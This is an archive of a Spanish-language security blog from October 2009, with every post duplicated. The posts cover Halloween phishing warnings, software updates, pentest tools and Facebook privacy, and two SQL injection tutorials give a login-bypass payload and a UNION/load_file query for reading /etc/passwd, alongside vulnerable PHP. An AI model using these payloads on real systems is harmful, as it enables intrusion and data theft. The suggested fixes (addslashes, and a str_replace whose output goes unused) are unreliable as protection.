Backup Oficial de SeguridadBlanca.Org

sábado, 31 de octubre de 2009

Halloween!!!


Mi Día Favorito en todo el año... Este 31 de Octubre las empresas de Seguridad mas Reconocidas Recomiendan Que Toda la gente Actualize su software, sus Anti-Virus, Su Anti-Malware, Ad-Aware y mucho mas... Ahora yo les quiero dar unas recomendaciones de Seguridad Sobre este dia y como se debe pasar en la red...


Primero Pues que Actualizen sus Anti-Virus y Software de protección de PCs que tengan instalado en su PC.

Segundo, Los Correos, Tengan Cuidado que ahora estan llegando muchas cartas de halloween, parecidas a las de navidad, llegan como si fuesen invitaciones o targetas virtuales, deben tener cuidado ya que estas pueden llevar malware... o algun tipo de virus informático.

El Spam en si... Todos aquellos administradores les recomiendo levanten bien su firewall y pues que verifiquen elo servidor de correos...

Para Aquellos que van a pasar en sus pcs tengan cuidado con la propagación por msn de virus y gusanitos... los tipicos de mira la foto pero con relación a halloween que podrán ayudar a convencer a una victima:

Mira como está la plaza mira cuanta gente -> cualquiera que está castigado o en su casa por a b c o d motivo querra aceptar para ver y saber de lo que se pierde... El masoquismo humano...


Ahora Pues con eso creo que les irá bien el dia de hoy y no me queda mas que decir...


Feliz Halloween les Desea SeguridadBlanca... Muajajajaja

PD: Disculpen la risa es parte de la emoción por mi dia favorito...


Saludos
Dr.White

Halloween!!!


Mi Día Favorito en todo el año... Este 31 de Octubre las empresas de Seguridad mas Reconocidas Recomiendan Que Toda la gente Actualize su software, sus Anti-Virus, Su Anti-Malware, Ad-Aware y mucho mas... Ahora yo les quiero dar unas recomendaciones de Seguridad Sobre este dia y como se debe pasar en la red...


Primero Pues que Actualizen sus Anti-Virus y Software de protección de PCs que tengan instalado en su PC.

Segundo, Los Correos, Tengan Cuidado que ahora estan llegando muchas cartas de halloween, parecidas a las de navidad, llegan como si fuesen invitaciones o targetas virtuales, deben tener cuidado ya que estas pueden llevar malware... o algun tipo de virus informático.

El Spam en si... Todos aquellos administradores les recomiendo levanten bien su firewall y pues que verifiquen elo servidor de correos...

Para Aquellos que van a pasar en sus pcs tengan cuidado con la propagación por msn de virus y gusanitos... los tipicos de mira la foto pero con relación a halloween que podrán ayudar a convencer a una victima:

Mira como está la plaza mira cuanta gente -> cualquiera que está castigado o en su casa por a b c o d motivo querra aceptar para ver y saber de lo que se pierde... El masoquismo humano...


Ahora Pues con eso creo que les irá bien el dia de hoy y no me queda mas que decir...


Feliz Halloween les Desea SeguridadBlanca... Muajajajaja

PD: Disculpen la risa es parte de la emoción por mi dia favorito...


Saludos
Dr.White

Sql Injection Login Bypass - La Explicación

En algun momento nosotros hemos hecho un login bypass para entrar mediante una sql injection...

Nuestro Code Vulnerable seria algo como este:


<?php

$user = $_POST['username'];

$pass = md5($_POST['password']);

$result = mysql_query("SELECT * FROM " . $tabla . "login WHERE username = '$user' AND password = '$pass'")

or die("<p><i>" . mysql_error() . "</i></p>\n");

?>


Ahora el codigo esta chequeando mal el user y la pass, no está bien puesto el codigo... entonces si nosotros pusieramos en el login:

username : admin ' or ' 1=1
password : mipassnoesesta

lo que hriamos nosotros sería transformar la petición en básicamente esto:

$result = mysql_query("SELECT * FROM " . $tabla . "login WHERE username = 'admin' ' or ' 1=1 AND password = 'mipassnoesesta'")

Ahora nostros solo tendriamos que poner un usuario que exista y entrariamos como tal... genial no?

para aquellos que solo sabian que si ponian la inyeccion entraban ya saben por que es y bueno para evitar esto pues podriamos usar los mismo que en el anterior tutorial de como obtener archivos del servidor con sql injection

esas tecnicas pueden usar para evitar esto...


Espero les haya gustado y asi pueden evitar que les pase esto a las empresas que los contrate...


Saludos
Dr.White

Sql Injection Login Bypass - La Explicación

En algun momento nosotros hemos hecho un login bypass para entrar mediante una sql injection...

Nuestro Code Vulnerable seria algo como este:


<?php

$user = $_POST['username'];

$pass = md5($_POST['password']);

$result = mysql_query("SELECT * FROM " . $tabla . "login WHERE username = '$user' AND password = '$pass'")

or die("<p><i>" . mysql_error() . "</i></p>\n");

?>


Ahora el codigo esta chequeando mal el user y la pass, no está bien puesto el codigo... entonces si nosotros pusieramos en el login:

username : admin ' or ' 1=1
password : mipassnoesesta

lo que hriamos nosotros sería transformar la petición en básicamente esto:

$result = mysql_query("SELECT * FROM " . $tabla . "login WHERE username = 'admin' ' or ' 1=1 AND password = 'mipassnoesesta'")

Ahora nostros solo tendriamos que poner un usuario que exista y entrariamos como tal... genial no?

para aquellos que solo sabian que si ponian la inyeccion entraban ya saben por que es y bueno para evitar esto pues podriamos usar los mismo que en el anterior tutorial de como obtener archivos del servidor con sql injection

esas tecnicas pueden usar para evitar esto...


Espero les haya gustado y asi pueden evitar que les pase esto a las empresas que los contrate...


Saludos
Dr.White

viernes, 30 de octubre de 2009

Actualizacion de Seguridad a Mozilla Firefox


Despues de haberle reportado 11 vulnerabilidades en octubre Mozilla Firefox...


Aquí les puedo dejar la página de los advisors para que ustedes se informen mas de las actualizaciones, les recomiendo que se actualizan ahora mismo en el caso que usen el navegador mozilla firefox...

click Aquí para ir al advisor...


Si quieres conseguir la última versión de mozilla firefox da click aquí...


En el Caso que quieran ir a la página de mozilla firefox den click aquí...


Si ustedes ya tienen instalado el mozilla firefox solo vayan al navegador, en la barra den click en ayuda y den click en buscar actualizaciones, ahi ya solo deben precionar para actualizar...


Saludos
Dr.White

Actualizacion de Seguridad a Mozilla Firefox


Despues de haberle reportado 11 vulnerabilidades en octubre Mozilla Firefox...


Aquí les puedo dejar la página de los advisors para que ustedes se informen mas de las actualizaciones, les recomiendo que se actualizan ahora mismo en el caso que usen el navegador mozilla firefox...

click Aquí para ir al advisor...


Si quieres conseguir la última versión de mozilla firefox da click aquí...


En el Caso que quieran ir a la página de mozilla firefox den click aquí...


Si ustedes ya tienen instalado el mozilla firefox solo vayan al navegador, en la barra den click en ayuda y den click en buscar actualizaciones, ahi ya solo deben precionar para actualizar...


Saludos
Dr.White

El Page Rank a tres!!!!

Despues de casi 5 meses de estar abierto el blog, nuestro pagerank ha subido a tres, esto es una felicidad ya que demuestra que nuestro ranking ha subido =)


Muchas Gracias a todos los lectores que nos apoyan dia a dia...


Saludos
Dr.White

El Page Rank a tres!!!!

Despues de casi 5 meses de estar abierto el blog, nuestro pagerank ha subido a tres, esto es una felicidad ya que demuestra que nuestro ranking ha subido =)


Muchas Gracias a todos los lectores que nos apoyan dia a dia...


Saludos
Dr.White

jueves, 29 de octubre de 2009

Ubuntu 9.10 Está Aquí




No Podía parar de pensar en el dia en que saliera, puse el count down y todo... pero... por fín llego, esta versión de ubuntu vendrá con mejor interfaz, su programación lo hace mas rápido que las anteriores versiones...




Yo soy fanático de linux y pues les puedo decir que de todas las distros que he probado ubuntu es una de las mejores, obvio hablando de gente normal que quiere cambiarse a open-source, está el debian tambien pero por hoy hablemos del que acaba de salir...


Pueden verlo desde la página oficial: Click Aquí


Para Ir directo a la descarga: Click Aquí


Espero les guste y ahora la probaré con mucho gusto ;)


Saludos
Dr.White

Ubuntu 9.10 Está Aquí




No Podía parar de pensar en el dia en que saliera, puse el count down y todo... pero... por fín llego, esta versión de ubuntu vendrá con mejor interfaz, su programación lo hace mas rápido que las anteriores versiones...




Yo soy fanático de linux y pues les puedo decir que de todas las distros que he probado ubuntu es una de las mejores, obvio hablando de gente normal que quiere cambiarse a open-source, está el debian tambien pero por hoy hablemos del que acaba de salir...


Pueden verlo desde la página oficial: Click Aquí


Para Ir directo a la descarga: Click Aquí


Espero les guste y ahora la probaré con mucho gusto ;)


Saludos
Dr.White

miércoles, 28 de octubre de 2009

Twittiemos con Programación ;)

Gracias al Proyecto conocido como PHP Twitter nosotros podemos escribir tweets y hacer una gran variedad de cosas con este proyecto que por medio de los APIS de Twitter te permite hacer muchas cosas...

Bueno pues por ahora les mostraré un ejemplo simple como loguearnos...


<?php

include "twitter.php";

$twit_login = new Twitter("usuario","contraseña");

?>


Con ese code nos loguearemos, básicamente lo que hacemos es llamar al archivo twitter.php que es nuestro archivo que nos hará posible escribir tweets y mas cosas...

Ahora como ya vieron con la funcion Twitter() nos hemos logueado... ahora... para escribir un tweet...


<?php

include "twitter.php";

$twit_login = new Twitter("usuario","contraseña");

$tweet = "Aprenda a usar twitter con php";

$twit_login->updateStatus($tweet);

?>


hemos usado la funcion update status y me gusta por que se relaciona en la syntaxis un poco con siertas cosas del perl...

Espero les sirva y pues asi pueden hacer webs con utilidades mas haya de las normales...


Referencias:

Woork Blog


Saludos
Dr.White

Twittiemos con Programación ;)

Gracias al Proyecto conocido como PHP Twitter nosotros podemos escribir tweets y hacer una gran variedad de cosas con este proyecto que por medio de los APIS de Twitter te permite hacer muchas cosas...

Bueno pues por ahora les mostraré un ejemplo simple como loguearnos...


<?php

include "twitter.php";

$twit_login = new Twitter("usuario","contraseña");

?>


Con ese code nos loguearemos, básicamente lo que hacemos es llamar al archivo twitter.php que es nuestro archivo que nos hará posible escribir tweets y mas cosas...

Ahora como ya vieron con la funcion Twitter() nos hemos logueado... ahora... para escribir un tweet...


<?php

include "twitter.php";

$twit_login = new Twitter("usuario","contraseña");

$tweet = "Aprenda a usar twitter con php";

$twit_login->updateStatus($tweet);

?>


hemos usado la funcion update status y me gusta por que se relaciona en la syntaxis un poco con siertas cosas del perl...

Espero les sirva y pues asi pueden hacer webs con utilidades mas haya de las normales...


Referencias:

Woork Blog


Saludos
Dr.White

martes, 27 de octubre de 2009

Obtener Archivos del Server con Sql Injection

Digamos que hemos encontrado un sql injection magic quoutes = off entonces usamos el Admin Path Finder para encontrar una panel pero resulta que no lo encuentra, entonces nosotros diriamos pero entonces que hacemos con el Sql Injection... vamos a hacer algo bien bacan...

Vamos a mostrar primero como sería el code vulnerable y por que lo es...

Code:


<?php
$id = $_GET['id'];
$peticion = mysql_query( "SELECT columna FROM usuarios WHERE id = '$id'");

?>


Ahora la mayoría mirará directo al codigo en sql y básicamente el error no está ahí,
el error está en el GET que hacemos... mm pues no está filtrado nada, ahora, ustedes dirán si no hay panel como explotamos?

Bueno comenzaremos a hacer la inyección a la variable ID en la web webvulnerable.com:

http://www.webvulnerable.pe/profile.php?id=1

Ahora vamos a inyectarla una inyeccion simple...


http://www.webvulnerable.pe/profile.php?id=1+union+all+select+1,2,3,4,5--


Nos manda un error diferente en el 4 entonces haremos una inyección como para no complicarnos...

http://www.webvulnerable.pe/profile.php?id=1+union+all+select+1,2,null,load_file('etc/passwd'),5--

En la inyección no hay mucho que decir lo diferente a lo normal que hemos usado es la funcion load_file() la cual nos ayuda a obtener el archivo etc/passwd/ ya ustedes ven si necesitan otro directorio o ustedes dirán que necesitan...

ahora ya sabemos como podemos atacar esto ahora como podemos hacer para que este ataque no nos afecte?...

simplemente hay que hacer algo pequeño:


<?php
$id = addslashes($_GET['id']);
$peticion = mysql_query( "SELECT columna FROM usuarios WHERE id = '$id'");

?>


hemos añadido addslashes() a nuestro codigo lo cual hará que no podamos poner caracteres inválidos, es mejor que usen otras funciones hechas por ustedes mismos o un str_replace() para un mejor funcionamiento de sus scripts...


Espero les sirva este tutorial y como vieron nisiquiera subimos shell...

Si el Magic_quotes esta off entonces podremos hacer uno que otro movimiento mas a nuestro favor...


EDIT - Filtro recomendado por Ozx - undersecurity.net:


<?php
$id = (int)$_GET['id'];
$peticion = mysql_query( "SELECT columna FROM usuarios WHERE id = '$id'");

?>

====

Otra Opción con Str Replace... by me...


<?php
$id = $_GET['id'];
$user = str_replace("select","lamo",$id);
$peticion = mysql_query( "SELECT columna FROM usuarios WHERE id = '$id'");

?>


ustedes modifiquen el str_replace segun su necesidad, yo no se lo que ustedes deseen...



Saludos
Dr.White

Obtener Archivos del Server con Sql Injection

Digamos que hemos encontrado un sql injection magic quoutes = off entonces usamos el Admin Path Finder para encontrar una panel pero resulta que no lo encuentra, entonces nosotros diriamos pero entonces que hacemos con el Sql Injection... vamos a hacer algo bien bacan...

Vamos a mostrar primero como sería el code vulnerable y por que lo es...

Code:


<?php
$id = $_GET['id'];
$peticion = mysql_query( "SELECT columna FROM usuarios WHERE id = '$id'");

?>


Ahora la mayoría mirará directo al codigo en sql y básicamente el error no está ahí,
el error está en el GET que hacemos... mm pues no está filtrado nada, ahora, ustedes dirán si no hay panel como explotamos?

Bueno comenzaremos a hacer la inyección a la variable ID en la web webvulnerable.com:

http://www.webvulnerable.pe/profile.php?id=1

Ahora vamos a inyectarla una inyeccion simple...


http://www.webvulnerable.pe/profile.php?id=1+union+all+select+1,2,3,4,5--


Nos manda un error diferente en el 4 entonces haremos una inyección como para no complicarnos...

http://www.webvulnerable.pe/profile.php?id=1+union+all+select+1,2,null,load_file('etc/passwd'),5--

En la inyección no hay mucho que decir lo diferente a lo normal que hemos usado es la funcion load_file() la cual nos ayuda a obtener el archivo etc/passwd/ ya ustedes ven si necesitan otro directorio o ustedes dirán que necesitan...

ahora ya sabemos como podemos atacar esto ahora como podemos hacer para que este ataque no nos afecte?...

simplemente hay que hacer algo pequeño:


<?php
$id = addslashes($_GET['id']);
$peticion = mysql_query( "SELECT columna FROM usuarios WHERE id = '$id'");

?>


hemos añadido addslashes() a nuestro codigo lo cual hará que no podamos poner caracteres inválidos, es mejor que usen otras funciones hechas por ustedes mismos o un str_replace() para un mejor funcionamiento de sus scripts...


Espero les sirva este tutorial y como vieron nisiquiera subimos shell...

Si el Magic_quotes esta off entonces podremos hacer uno que otro movimiento mas a nuestro favor...


EDIT - Filtro recomendado por Ozx - undersecurity.net:


<?php
$id = (int)$_GET['id'];
$peticion = mysql_query( "SELECT columna FROM usuarios WHERE id = '$id'");

?>

====

Otra Opción con Str Replace... by me...


<?php
$id = $_GET['id'];
$user = str_replace("select","lamo",$id);
$peticion = mysql_query( "SELECT columna FROM usuarios WHERE id = '$id'");

?>


ustedes modifiquen el str_replace segun su necesidad, yo no se lo que ustedes deseen...



Saludos
Dr.White

WaRvox PenTest your Voip

WaRvox es una herramienta de auditoría de seguridad en VOIP y otros sistemas de Telefonía, Para usar este producto no se necesita un hardware de VOIP solo necesitas el software para el analisis del funcionamiento y desenvolvimiento de las llamadas que se realizan.

Este software ha sido diseñado para un buen funcionamiento en sistemas linux, esta Aplicación se puede obtener del repertorio de metasploit...

http://metasploit.com/svn/warvox/trunk/

Lógicamente se puede obtener de la página principal para no obviar algunas actualizaciones que quizas metaspl0it puede pasar por alto...

Descargar la 1.0.1:

Click aquí

esta aplicacion se usa desde el navegador, hay que configurarla y compilarla pero su funcionamiento es simple y rápido debido a su code y GUI.

Aquí podemos ver una de las imagenes de como es la interfaz de uso...





La imagen menciona el puerto 45555 sin embargo por default se instala en el 777,

espero les guste esta APP no quiero mentirles aun no la pruebo bien pero me la recomendo mucho un amigo en el cual confio ya que siempre me da buenas APPs...

Click aquí para ir a la web oficial

Saludos
Dr.White

WaRvox PenTest your Voip

WaRvox es una herramienta de auditoría de seguridad en VOIP y otros sistemas de Telefonía, Para usar este producto no se necesita un hardware de VOIP solo necesitas el software para el analisis del funcionamiento y desenvolvimiento de las llamadas que se realizan.

Este software ha sido diseñado para un buen funcionamiento en sistemas linux, esta Aplicación se puede obtener del repertorio de metasploit...

http://metasploit.com/svn/warvox/trunk/

Lógicamente se puede obtener de la página principal para no obviar algunas actualizaciones que quizas metaspl0it puede pasar por alto...

Descargar la 1.0.1:

Click aquí

esta aplicacion se usa desde el navegador, hay que configurarla y compilarla pero su funcionamiento es simple y rápido debido a su code y GUI.

Aquí podemos ver una de las imagenes de como es la interfaz de uso...





La imagen menciona el puerto 45555 sin embargo por default se instala en el 777,

espero les guste esta APP no quiero mentirles aun no la pruebo bien pero me la recomendo mucho un amigo en el cual confio ya que siempre me da buenas APPs...

Click aquí para ir a la web oficial

Saludos
Dr.White

lunes, 26 de octubre de 2009

PwnTooth - Pentesting Bluetooth


Eexcelente Herramienta para hacerle pen-test a un dispositivos bluetooth, hoy lo he probado y funciona de maravilla =)

Lo que hace básicamente es automatizarte una busqueda de errores del dispositivo que analiza, tu puedes elejir las tools con las que analiza, tiene un repositorio de extención normal que podría mejorar, tu solo tienes que poner la configuración de la herramienta para que los resultados sean los deseados...


La versión mas actualizada 0.2.2 cuenta con un rápido escaneo, facil configuración por medio del archivo pwntooth.conf en el directorio /etc/bluetooth/ esta herramienta no es muy difícil de usar como repito y la recomiendo en un 100%


En Este Link puedes encontrar las versiones mas antiguas y actuales de esta herramienta...

Pagina Oficial:

Click Aquí


Saludos
Dr.White

PwnTooth - Pentesting Bluetooth


Eexcelente Herramienta para hacerle pen-test a un dispositivos bluetooth, hoy lo he probado y funciona de maravilla =)

Lo que hace básicamente es automatizarte una busqueda de errores del dispositivo que analiza, tu puedes elejir las tools con las que analiza, tiene un repositorio de extención normal que podría mejorar, tu solo tienes que poner la configuración de la herramienta para que los resultados sean los deseados...


La versión mas actualizada 0.2.2 cuenta con un rápido escaneo, facil configuración por medio del archivo pwntooth.conf en el directorio /etc/bluetooth/ esta herramienta no es muy difícil de usar como repito y la recomiendo en un 100%


En Este Link puedes encontrar las versiones mas antiguas y actuales de esta herramienta...

Pagina Oficial:

Click Aquí


Saludos
Dr.White

Ahora Reflexionemos

Articulo Escrito por Walter Cuestas - http://wcuestas.blogspot.com

Titulo oficial: Absurdo Lógico
===============================


No se cuantas personas lean este blog porque he dejado de postear con frecuencia, pero, al menos se que esta indexado en Google y algun dia alguien lo leera.
Hay un par de casos que me han llevado a un convencimiento y que corresponde a lo que es un dicho popular : el peor enemigo de un peruano, es otro peruano.
Hace un tiempo tuvimos en mi organizacion un caso de impugnacion de un concurso publico con una entidad del Estado porque un postor presento un certificado adulterado de su consultor principal. La impugnacion la realizamos ante CONSUCODE (hoy OSCE) y luego de demostrar que teniamos la razon, le retiraron la buena pro, nos la dieron a nosotros e indicaron que dicha institucion del Estado debia tomar acciones.
Al postor que presento los documentos adulterados no solamente no lo han sancionado (esto fue setiembre del 2008) sino que incluso participo en un concurso similar para un servicio tambien similar solicitado por el OSCE.
Hoy recibi una citacion del Ministerio Publico para dar testimonio respecto a la denuncia que la institucion del Estado presento contra el consultor. Es bueno que se tomen acciones, pero, por que no he recibido una citacion similar para una denuncia con respecto al postor que presento los documentos adulterados ? Como les consta a estas personas (porque las instituciones son manejadas por personas) que fue el consultor quien adultero los documentos y no alguien del postor ? Sera que han denunciado a ambos y por esas cosas del tiempo y destiono luego me pediran testimoniar por la denuncia contra el postor ?
Ojala sea lo ultimo.
El otro caso corresponde a una institucion educativa de prestigio que hace un tiempo convoco a un consultor extranjero para un evento sobre hacking, dio una charla y tal vez hasta dieron un curso. Al poco tiempo empezaron a circular notas sobre esta persona por Internet y hasta sacaron un site donde se difundia el hecho que utilizara de manera no autorizada el nombre de una organizacion mundial que certifica hackers y que entregara material de ellos sin autorizacion.
Por la documentacion que he visto desde su site, usa informacion y logos que solo pueden ser usados por quienes representan a esta organizacion y en conversaciones con quienes la representan en Latino America nos han indicado su molestia por como esta persona hace uso de logos, graficos e informacion sin su autorizacion.
Bien, esta institucion educativa peruana volvio a convocar a este consultor este año para otro evento y lanzamiento de un curso de ETHICAL hacking. Ellos parecen no tener acceso a Internet, seguro viven aun en la epoca de los teletipos y las maquinas de escribir Olivetti.
A pesar que se les ha informado de todo esto, hacen oidos sordos y un amigo nuestro les hablo en persona sobre el tema, su respuesta fue alucinante : es que no hay gente como el aca...es decir, se referian a su capacidad y certificaciones.
Yo debo atribuir semejante ignorancia al hecho que la seguridad es un tema nuevo en nuestro pais y no a una majaderia, pero, no puedo evitar pensar que le creen al consultor porque es EXTRANJERO.
Asi que cuando vemos que nuestro mercado de seguridad informatica no crece como en otros paises, no basta con echarle la culpa a la negligencia corporativa, debemos analizar si no existen actitudes intermedias que minan cualquier tipo de avance de iniciativas locales favoreciendo a extranjeros solo por la estupidez de creer que todo lo que viene de afuera es mejor y mas grande y, claro, honesto.



Solo comparto esta entrada escrita por el para que refleccionemos de lo que hacemos y hasta donde nos puede llevar la competencia...

Saludos
Dr.White

Ahora Reflexionemos

Articulo Escrito por Walter Cuestas - http://wcuestas.blogspot.com

Titulo oficial: Absurdo Lógico
===============================


No se cuantas personas lean este blog porque he dejado de postear con frecuencia, pero, al menos se que esta indexado en Google y algun dia alguien lo leera.
Hay un par de casos que me han llevado a un convencimiento y que corresponde a lo que es un dicho popular : el peor enemigo de un peruano, es otro peruano.
Hace un tiempo tuvimos en mi organizacion un caso de impugnacion de un concurso publico con una entidad del Estado porque un postor presento un certificado adulterado de su consultor principal. La impugnacion la realizamos ante CONSUCODE (hoy OSCE) y luego de demostrar que teniamos la razon, le retiraron la buena pro, nos la dieron a nosotros e indicaron que dicha institucion del Estado debia tomar acciones.
Al postor que presento los documentos adulterados no solamente no lo han sancionado (esto fue setiembre del 2008) sino que incluso participo en un concurso similar para un servicio tambien similar solicitado por el OSCE.
Hoy recibi una citacion del Ministerio Publico para dar testimonio respecto a la denuncia que la institucion del Estado presento contra el consultor. Es bueno que se tomen acciones, pero, por que no he recibido una citacion similar para una denuncia con respecto al postor que presento los documentos adulterados ? Como les consta a estas personas (porque las instituciones son manejadas por personas) que fue el consultor quien adultero los documentos y no alguien del postor ? Sera que han denunciado a ambos y por esas cosas del tiempo y destiono luego me pediran testimoniar por la denuncia contra el postor ?
Ojala sea lo ultimo.
El otro caso corresponde a una institucion educativa de prestigio que hace un tiempo convoco a un consultor extranjero para un evento sobre hacking, dio una charla y tal vez hasta dieron un curso. Al poco tiempo empezaron a circular notas sobre esta persona por Internet y hasta sacaron un site donde se difundia el hecho que utilizara de manera no autorizada el nombre de una organizacion mundial que certifica hackers y que entregara material de ellos sin autorizacion.
Por la documentacion que he visto desde su site, usa informacion y logos que solo pueden ser usados por quienes representan a esta organizacion y en conversaciones con quienes la representan en Latino America nos han indicado su molestia por como esta persona hace uso de logos, graficos e informacion sin su autorizacion.
Bien, esta institucion educativa peruana volvio a convocar a este consultor este año para otro evento y lanzamiento de un curso de ETHICAL hacking. Ellos parecen no tener acceso a Internet, seguro viven aun en la epoca de los teletipos y las maquinas de escribir Olivetti.
A pesar que se les ha informado de todo esto, hacen oidos sordos y un amigo nuestro les hablo en persona sobre el tema, su respuesta fue alucinante : es que no hay gente como el aca...es decir, se referian a su capacidad y certificaciones.
Yo debo atribuir semejante ignorancia al hecho que la seguridad es un tema nuevo en nuestro pais y no a una majaderia, pero, no puedo evitar pensar que le creen al consultor porque es EXTRANJERO.
Asi que cuando vemos que nuestro mercado de seguridad informatica no crece como en otros paises, no basta con echarle la culpa a la negligencia corporativa, debemos analizar si no existen actitudes intermedias que minan cualquier tipo de avance de iniciativas locales favoreciendo a extranjeros solo por la estupidez de creer que todo lo que viene de afuera es mejor y mas grande y, claro, honesto.



Solo comparto esta entrada escrita por el para que refleccionemos de lo que hacemos y hasta donde nos puede llevar la competencia...

Saludos
Dr.White

sábado, 24 de octubre de 2009

Habbo Hotel Infectando Usuarios?

El conocido juego online Habbo Hotel no cuida la publicidad que pone, el dia de hoy me dijeron que lo juegue y vi que tenian un cms bien peculear... decidi darle click a un link y miren:



si me lo preguntan la página es externa, pero creo que habbo debería de fijarse el tipo de publicidad que pone en sus links ya que ellos se basan en tener una muy buena seguridad y que los niños estan seguros pero de cuando aca un troyano es algo seguro?

sin embargo pues tambien puede que habbo quiera infectar a sus usuarios para mantener un control sobre ellos... son solo especulaciones pero realmente no quiero exagerar la cosa, si hay un troyano pero el hecho está en que habbo hotel debería cuidar mas a los usuarios no creo que sea respetable que una empresa tan grande como lo es Sulake deje pasar cosas como estas...


Saludos
Dr.White

Habbo Hotel Infectando Usuarios?

El conocido juego online Habbo Hotel no cuida la publicidad que pone, el dia de hoy me dijeron que lo juegue y vi que tenian un cms bien peculear... decidi darle click a un link y miren:



si me lo preguntan la página es externa, pero creo que habbo debería de fijarse el tipo de publicidad que pone en sus links ya que ellos se basan en tener una muy buena seguridad y que los niños estan seguros pero de cuando aca un troyano es algo seguro?

sin embargo pues tambien puede que habbo quiera infectar a sus usuarios para mantener un control sobre ellos... son solo especulaciones pero realmente no quiero exagerar la cosa, si hay un troyano pero el hecho está en que habbo hotel debería cuidar mas a los usuarios no creo que sea respetable que una empresa tan grande como lo es Sulake deje pasar cosas como estas...


Saludos
Dr.White

Les recomiendo...

Hoy conversando con un colega me paso este PDF no es la gran cosa sinceramente... pero... es muy útil en siertas ocaciones, mas que nada si haces hardening de Sistemas Operativos...

Espero les sirva el PDF:

Click Aquí



Saludos y Disfrutenlo
Dr.White

Les recomiendo...

Hoy conversando con un colega me paso este PDF no es la gran cosa sinceramente... pero... es muy útil en siertas ocaciones, mas que nada si haces hardening de Sistemas Operativos...

Espero les sirva el PDF:

Click Aquí



Saludos y Disfrutenlo
Dr.White

viernes, 23 de octubre de 2009

Windows 7 y Regalitos...

Con la Salida del windows 7 que se supone mejorará las espectativas han salido a la luz varias ofertas que dejaran tontos a muchos...

Kaspersky Antivirus por 1 Año!!!! Gratis!!!! parece de locura pero con la salida del windows 7 microsoft hizo un acuerdo con dicha empresa para que de estos regalitos a los usuarios de microsoft...

Apuren ya que no son infinitas...

Como funciona esta magia?


van a ir a este link y podran anotarse para obtener estas licencias gratis, los usuarios con windows vista que hayan comprado recientemente su PC tambien tendran la posibilidad de actualizar el S.O a Windows 7...

Espero aprecien el regalito de microsoft, tambien habian licencias de panda pero se agoto el tiempo de pedida de las mismas...


Saludos y Que lo disfruten...
Dr.White

Windows 7 y Regalitos...

Con la Salida del windows 7 que se supone mejorará las espectativas han salido a la luz varias ofertas que dejaran tontos a muchos...

Kaspersky Antivirus por 1 Año!!!! Gratis!!!! parece de locura pero con la salida del windows 7 microsoft hizo un acuerdo con dicha empresa para que de estos regalitos a los usuarios de microsoft...

Apuren ya que no son infinitas...

Como funciona esta magia?


van a ir a este link y podran anotarse para obtener estas licencias gratis, los usuarios con windows vista que hayan comprado recientemente su PC tambien tendran la posibilidad de actualizar el S.O a Windows 7...

Espero aprecien el regalito de microsoft, tambien habian licencias de panda pero se agoto el tiempo de pedida de las mismas...


Saludos y Que lo disfruten...
Dr.White

Cuidado con el Robo de Info de Facebook

Como la mayoría tiene Facebook pues no se les hara muy poco conocido el término farmville o quizas el juego de la combi de la San Ignacio... Battle of The Band y algunas aplicaciones mas, pero que nos hace pensar que aquel que maneja la aplicación no es un Ladron de Información que lo que quiere son correos o la información personal de uno de nosotros...


Bastaría con que demos click en Permitir en el preview de la App de Facebook para que el creador tenga acceso a nuestros contactos... A nadie le agrada que gente que no conoce que ni sabe de donde es le esté viendo el perfil entonces aquí les voy a dar una recomendaciones para la gente de facebook que no quiere que le roben la información o ser simples victimas de este tipo de ataques.


Primero que todo les debo mencionar algunas aplicaciones con malware o que han sido detectadas como piratas:

* CityFireDepartment
* MyGirlySpace
* Ferrarifone
* Mashpro
* Mynameis
* Pass-it-on
* Fillinthe
* Aquariumlife

Obtenidas de Security By Default

----


Ahora si pues primero deben saber que ninguna aplicacion te llega como publicidad por mail... esto sería el caso de un tipo de falsificación de mails ya que usarían un mail de facebook como alerta y eso no es metodo de facebook por ahora eso no existe...

Ahora tambien me gustaría recalcar que solo debemos hacer uso de aplicaciones que sabemos que estan hechas por gente sería o por empresas las cuales sabemos no son ladronas de datos...

Si saben su grado de madurez por ejemplo... no deberían meterse a aplicaciones que te lo digan, si te consideras una persona atractiva tampoco entres a esos test de que tan atractivo eres... y ahora el mejor de todos piropos de galan... por favor la persona que lo hace los saca de algun lugar, ustedes sean inteligentes solo hace falta ir a http://www.google.com y listo... buscan frases inclusive pueden usar los google dorks...


Bueno Básicamente asi nos podemos proteger y pues siempre poner una configuración en facebook de nuestro perfil de acuerdo a lo que queremos y a lo que queremos que los demas vean o no vean...


Espero les sirva esta información y si ustedes pertenecen al area de sistemas de alguna empresa, enseñenle esto a los usuarios ya que pueden perjudicar a la empresa el robo de datos de algun empleado...


Saludos
Dr.White

Cuidado con el Robo de Info de Facebook

Como la mayoría tiene Facebook pues no se les hara muy poco conocido el término farmville o quizas el juego de la combi de la San Ignacio... Battle of The Band y algunas aplicaciones mas, pero que nos hace pensar que aquel que maneja la aplicación no es un Ladron de Información que lo que quiere son correos o la información personal de uno de nosotros...


Bastaría con que demos click en Permitir en el preview de la App de Facebook para que el creador tenga acceso a nuestros contactos... A nadie le agrada que gente que no conoce que ni sabe de donde es le esté viendo el perfil entonces aquí les voy a dar una recomendaciones para la gente de facebook que no quiere que le roben la información o ser simples victimas de este tipo de ataques.


Primero que todo les debo mencionar algunas aplicaciones con malware o que han sido detectadas como piratas:

* CityFireDepartment
* MyGirlySpace
* Ferrarifone
* Mashpro
* Mynameis
* Pass-it-on
* Fillinthe
* Aquariumlife

Obtenidas de Security By Default

----


Ahora si pues primero deben saber que ninguna aplicacion te llega como publicidad por mail... esto sería el caso de un tipo de falsificación de mails ya que usarían un mail de facebook como alerta y eso no es metodo de facebook por ahora eso no existe...

Ahora tambien me gustaría recalcar que solo debemos hacer uso de aplicaciones que sabemos que estan hechas por gente sería o por empresas las cuales sabemos no son ladronas de datos...

Si saben su grado de madurez por ejemplo... no deberían meterse a aplicaciones que te lo digan, si te consideras una persona atractiva tampoco entres a esos test de que tan atractivo eres... y ahora el mejor de todos piropos de galan... por favor la persona que lo hace los saca de algun lugar, ustedes sean inteligentes solo hace falta ir a http://www.google.com y listo... buscan frases inclusive pueden usar los google dorks...


Bueno Básicamente asi nos podemos proteger y pues siempre poner una configuración en facebook de nuestro perfil de acuerdo a lo que queremos y a lo que queremos que los demas vean o no vean...


Espero les sirva esta información y si ustedes pertenecen al area de sistemas de alguna empresa, enseñenle esto a los usuarios ya que pueden perjudicar a la empresa el robo de datos de algun empleado...


Saludos
Dr.White

miércoles, 21 de octubre de 2009

Pentest: Explotación de LFI por Avatar Uploader

